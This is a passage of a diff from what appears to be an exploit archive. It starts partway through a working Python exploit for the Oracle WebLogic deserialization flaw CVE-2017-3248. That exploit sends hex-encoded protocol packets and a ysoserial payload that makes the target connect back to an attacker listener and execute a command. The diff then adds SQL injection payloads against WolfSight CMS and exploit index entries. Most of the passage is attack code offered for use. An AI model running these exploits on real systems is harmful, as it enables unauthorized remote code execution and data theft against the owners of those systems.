64d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e32323700124141414141414141414141413154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3131312e3131312e302e31313161863d1d0000000078'
+#C. Packet 3 to send:
+#C.1 length
+payload_3_1 = "000003b3"
+#C.2 first part
+payload_3_2 = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000'
+#C.3.1 sub payload
+payload_3_3_1 = 'aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
+#C.3.2 Ysoserial Payload generated in real time
+payload_3_3_2 = ""
+#C.4 End of the payload
+payload_3_4 = 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
+
+def runCmd(cmd):
+ proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
+ stdout_value = proc.stdout.read() + proc.stderr.read()
+ return stdout_value
+
+def getJrmpClientPayloadEncoded(attackerIp, attackerJRMPListenerPort, ysoPath):
+ completeCmd = CMD_GET_JRMPCLIENT_PAYLOAD.format(ysoPath, ARGS_YSO_GET_PAYLOD.format(attackerIp, attackerJRMPListenerPort))
+ print "[+] Ysoserial command (JRMP client): {0}".format(repr(completeCmd))
+ stdout = runCmd(cmd = completeCmd)
+ return stdout
+
+def exploit(targetIP, targetPort, attackerIP, attackerJRMPPort, cmd, testOnly=False, payloadType='CommonsCollections5', sslEnabled=False, ysoPath=""):
+ if testOnly == True:
+ attackerIP = "127.0.0.1"
+ attackerJRMPPort = 0
+ print "[+] Connecting to {0}:{1} ...".format(targetIP, targetPort)
+ if sslEnabled == True:
+ print "[+] ssl mode enabled"
+ s = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
+ else:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ print "[+] ssl mode disabled"
+ s.connect((targetIP, targetPort))
+ print "[+] Connected to {0}:{1}".format(targetIP, targetPort)
+ print "[+] Sending first packet..."
+ #print "[S1] Sending {0}".format(repr(payload_1.decode('hex')))
+ s.sendall(payload_1.decode('hex'))
+ data = s.recv(4096)
+ #print '[R1] Received', repr(data)
+ print "[+] Sending second packet..."
+ #print "[S2] Sending {0}".format(repr(payload_2.decode('hex')))
+ s.sendall(payload_2.decode('hex'))
+ data = s.recv(4096)
+ #print '[R2] Received', repr(data)
+ print "[+] Generating with ysoserial the third packet which contains a JRMPClient payload..."
+ payload_3_3_2 = getJrmpClientPayloadEncoded(attackerIp=attackerIP, attackerJRMPListenerPort=attackerJRMPPort, ysoPath=ysoPath)
+ payload= payload_3_1 + payload_3_2 + payload_3_3_1 + payload_3_3_2 + payload_3_4
+ payload = payload.replace(payload_3_1, "0000{:04x}".format(len(payload)/2), 1)
+ sendata = payload.decode('hex')
+ if testOnly == False:
+ print "[+] You have to execute the following command locally:"
+ print " {0}".format(CMD_YSO_LISTEN.format(ysoPath, attackerJRMPPort, payloadType,cmd))
+ raw_input("[+] Press Enter when this previous command is running...")
+ print "[+] Sending third packet..."
+ #print "[S3] Sending {0}".format(repr(sendata))
+ s.sendall(sendata)
+ data = s.recv(4096)
+ s.close()
+ #print '[R3] Received', repr(data)
+ if testOnly == True:
+ if "cannot be cast to weblogic" in str(data):
+ print "[+] 'cannot be cast to weblogic' string in the third response from server"
+ print "\n{2}\n[-] target {0}:{1} is not vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60)
+ else:
+ print "[+] 'cannot be cast to weblogic' string is NOT in the third response from server"
+ print "\n{2}\n[+] target {0}:{1} is vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60)
+ else:
+ print "[+] The target will connect to {0}:{1}".format(attackerIP, attackerJRMPPort)
+ print "[+] The command should be executed on the target after connection on {0}:{1}".format(attackerIP, attackerJRMPPort)
+
+def main():
+ argsParsed = argparse.ArgumentParser(description=HELP_MESSAGE, formatter_class=RawTextHelpFormatter)
+ argsParsed.add_argument("-t", dest='target', required=True, help='target IP')
+ argsParsed.add_argument("-p", dest='port', type=int, required=True, help='target port')
+ argsParsed.add_argument("--jip", dest='attackerIP', required=False, help='Local JRMP listener ip')
+ argsParsed.add_argument("--jport", dest='attackerPort', type=int, default=3412, required=False, help='Local JRMP listener port (default: %(default)s)')
+ argsParsed.add_argument("--cmd", dest='cmdToExecute', help='Command to execute on the target')
+ argsParsed.add_argument("--check", dest='check', action='store_true', default=False, help='Check if vulnerable')
+ argsParsed.add_argument("--ssl", dest='sslEnabled', action='store_true', default=False, help='Enable ssl connection')
+ argsParsed.add_argument("--ysopath", dest='ysoPath', required=True, default=False, help='Ysoserial path')
+ argsParsed.add_argument("--payloadType", dest='payloadType', default="CommonsCollections5", help='Payload to use in JRMP listener (default: %(default)s)')
+ args = dict(argsParsed.parse_args()._get_kwargs())
+ if os.path.isfile(args['ysoPath'])==False:
+ print "[-] You have to give the path to Ysoserial with --ysopath (https://github.com/frohoff/ysoserial)!"
+ return -1
+ if args['check'] == False and args['attackerIP'] == None:
+ print "[-] You have to give an IP with --jip !"
+ return -1
+ elif args['check'] == False and args['cmdToExecute'] == None:
+ print "[-] You have to give a command to execute on the target with --cmd !"
+ return -1
+ if args['check'] == True:
+ print "[+] Checking if target {0}:{1} is vulnerable to CVE-2017-3248 without executing a system command on the target...".format(args['target'], args['port'])
+ exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=None, attackerJRMPPort=None, cmd=None, testOnly=True, sslEnabled=args['sslEnabled'], ysoPath=args['ysoPath'])
+ else:
+ print "[+] Exploiting target {0}:{1}...".format(args['target'], args['port'])
+ exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=args['attackerIP'], attackerJRMPPort=args['attackerPort'], cmd=args['cmdToExecute'], payloadType=args['payloadType'], testOnly=False, sslEnabled=args['sslEnabled'],ysoPath=args['ysoPath'])
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/44997.txt b/exploits/php/webapps/44997.txt
new file mode 100644
index 000000000..3705fe0c9
--- /dev/null
+++ b/exploits/php/webapps/44997.txt
@@ -0,0 +1,31 @@
+# Exploit Title: WolfSight CMS 3.2 - SQL Injection
+# Google Dork: N/A
+# Date: 2018-07-10
+# Exploit Author: Berk Dusunur & Zehra Karabiber
+# Vendor Homepage: http://www.wolfsight.com
+# Software Link: http://www.wolfsight.com
+# Version: v3.2
+# Tested on: Parrot OS / WinApp Server
+# CVE : N/A
+
+# PoC Sql Injection
+# Parameter: #1* (URI)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload:
+
+http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload:
+
+http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx
+
+# PoC Cross-Site Scripting
+# http://ip/admin/login.php
+# Username
+
+;”)
+
+# This vulnerability was identified during bug bounty
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 07951462d..34e62982a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -16603,8 +16603,10 @@ id,file,description,date,author,type,platform,port
44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
-44992,exploits/linux/remote/44992.rb,"HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
+44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
+45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
+45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39627,7 +39629,6 @@ id,file,description,date,author,type,platform,port
44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
-44970,exploits/linux/webapps/44970.txt,"ModSecurity 3.0.0 - Cross-Site Scripting",2018-07-03,"Adipta Basu",webapps,linux,
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
@@ -39636,3 +39637,8 @@ id,file,description,date,author,type,platform,port
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
+44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,
+44997,exploits/php/webapps/44997.txt,"WolfSight CMS 3.2 - SQL Injection",2018-07-10,"Berk Dusunur",webapps,php,80
+44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
+44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
+45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,